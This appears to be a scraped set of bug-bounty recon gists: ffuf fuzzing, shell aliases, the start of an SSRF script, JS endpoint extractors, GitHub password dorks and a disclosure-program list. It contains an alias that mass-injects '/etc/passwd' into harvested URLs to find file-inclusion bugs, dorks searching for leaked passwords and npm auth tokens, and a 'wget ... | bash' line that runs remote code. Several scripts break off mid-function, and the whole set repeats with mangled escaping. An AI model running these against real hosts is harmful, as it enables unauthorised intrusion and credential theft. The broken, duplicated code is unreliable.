aly_Inj3ctor AlishahMughal123

## MASS-FUZZ
===[ Start Fuzzing ]===
ffuf -w common.txt:FUZZ -w ~/bb/target/httpx.txt:URL -u URLFUZZ -mc 200 -of csv -o ffuf-result.txt

===[ See The Result ]===
cat ffuf-result.txt | awk -F ',' '{print $3}'

N.B: My wordlist have '/' at beginning
Example: /.git

If your wordlist start with '.git'

## bash_aliases.sh
lfi() {
	gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}

open-redirect() {
	local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}

## concurrency.go
package main

import (
	"sync"
	"net/http"
)

func example_function(){
	// function to be run concurrently
}

## .bash_profile

###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###

gauq() {

## ssrf.sh
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
  echo >&2 "ERROR: Domain not set"
  exit 2
fi
if [ -z "$2" ]; then
  echo >&2 "ERROR: Sever link not set"
  exit 2

## ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

## st8out.sh
#!/bin/bash

#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor

## Github bash generated search links (from hunter.sh)


echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo "  password"
echo "https://github.com/search?q=%22$1%22+password&type=Code"
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code"
echo ""
echo " npmrc _auth"

## bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue

## setup_bbty.sh
#!/bin/bash

#
# Execute as wget -O - https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885/raw | bash
# # Thanks JeffreyShran for the gist url thing
#
#
# It's debian based, so for centos and likewise you have to change apt to yum and similarly
#
InstallationStartTime=$(date +%s)
	===[ Start Fuzzing ]===
	ffuf -w common.txt:FUZZ -w ~/bb/target/httpx.txt:URL -u URLFUZZ -mc 200 -of csv -o ffuf-result.txt

	===[ See The Result ]===
	cat ffuf-result.txt \| awk -F ',' '{print $3}'

	N.B: My wordlist have '/' at beginning
	Example: /.git

	If your wordlist start with '.git'
	lfi() {
	gau $1 \| gf lfi \| qsreplace "/etc/passwd" \| xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 \| grep -q "root:x" && echo "VULN! %"'
	}

	open-redirect() {
	local LHOST="http://localhost"; gau $1 \| gf redirect \| qsreplace "$LHOST" \| xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 \| grep -q "Location: $LHOST" && echo "VULN! %"'
	}
	package main

	import (
	"sync"
	"net/http"
	)

	func example_function(){
	// function to be run concurrently
	}

	###
	# ▶ go get -u github.com/lc/gau
	# ▶ go get -u github.com/tomnomnom/qsreplace
	# ▶ go get -u github.com/tomnomnom/hacks/kxss
	# ▶ go get -u github.com/hahwul/dalfox
	# ▶ git clone https://github.com/dwisiswant0/DSSS
	###

	gauq() {
	echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
	echo "Usage: bash script.sh domain.com http://server-callbak"
	echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
	if [ -z "$1" ]; then
	echo >&2 "ERROR: Domain not set"
	exit 2
	fi
	if [ -z "$2" ]; then
	echo >&2 "ERROR: Sever link not set"
	exit 2
	curl -L -k -s https://www.example.com \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]" \| awk -F '//' '{if(length($2))print "https://"$2}' \| sort -fu \| xargs -I '%' sh -c "curl -k -s \"%\" \| sed \"s/[;}\)>]/\n/g\" \| grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\|(\.(get\|post\|ajax\|load)\s\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" \| awk -F "['\"]" '{print $2}' \| sort -fu

	# using linkfinder
	function ejs() {
	URL=$1;
	curl -Lks $URL \| tac \| sed "s#\\\/#\/#g" \| egrep -o "src['\"]?\s[=:]\s['\"]?[^'\"]+.js[^'\"> ]*" \| sed -r "s/^src['\"]?[=:]['\"]//g" \| awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' \| sort -fu \| xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" \| xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
	}

	# with file download (the new best one):
	# but there is a bug if you don't provide a root url
	#!/bin/bash

	#####
	#
	# St8out - Extra one-liner for reconnaissance
	#
	# Usage: ./st8out.sh target.com
	#
	# Resources:
	# - https://github.com/j3ssie/metabigor


	echo ""
	echo "********** Github Dork Links (must be logged in) *****************"
	echo ""
	echo " password"
	echo "https://github.com/search?q=%22$1%22+password&type=Code"
	echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code"
	echo ""
	echo " npmrc _auth"
	google dork -> site:.co.uk inurl:"responsible disclosure"
	https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
	http://www.123contactform.com/security-acknowledgements.htm
	https://18f.gsa.gov/vulnerability-disclosure-policy/
	https://support.1password.com/security-assessments/
	https://www.23andme.com/security-report/
	https://www.abnamro.com/en/footer/responsible-disclosure.html
	https://www.accenture.com/us-en/company-accenture-responsible-disclosure
	https://www.accredible.com/white_hat/
	https://www.acquia.com/how-report-security-issue
	#!/bin/bash

	#
	# Execute as wget -O - https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885/raw \| bash
	# # Thanks JeffreyShran for the gist url thing
	#
	#
	# It's debian based, so for centos and likewise you have to change apt to yum and similarly
	#
	InstallationStartTime=$(date +%s)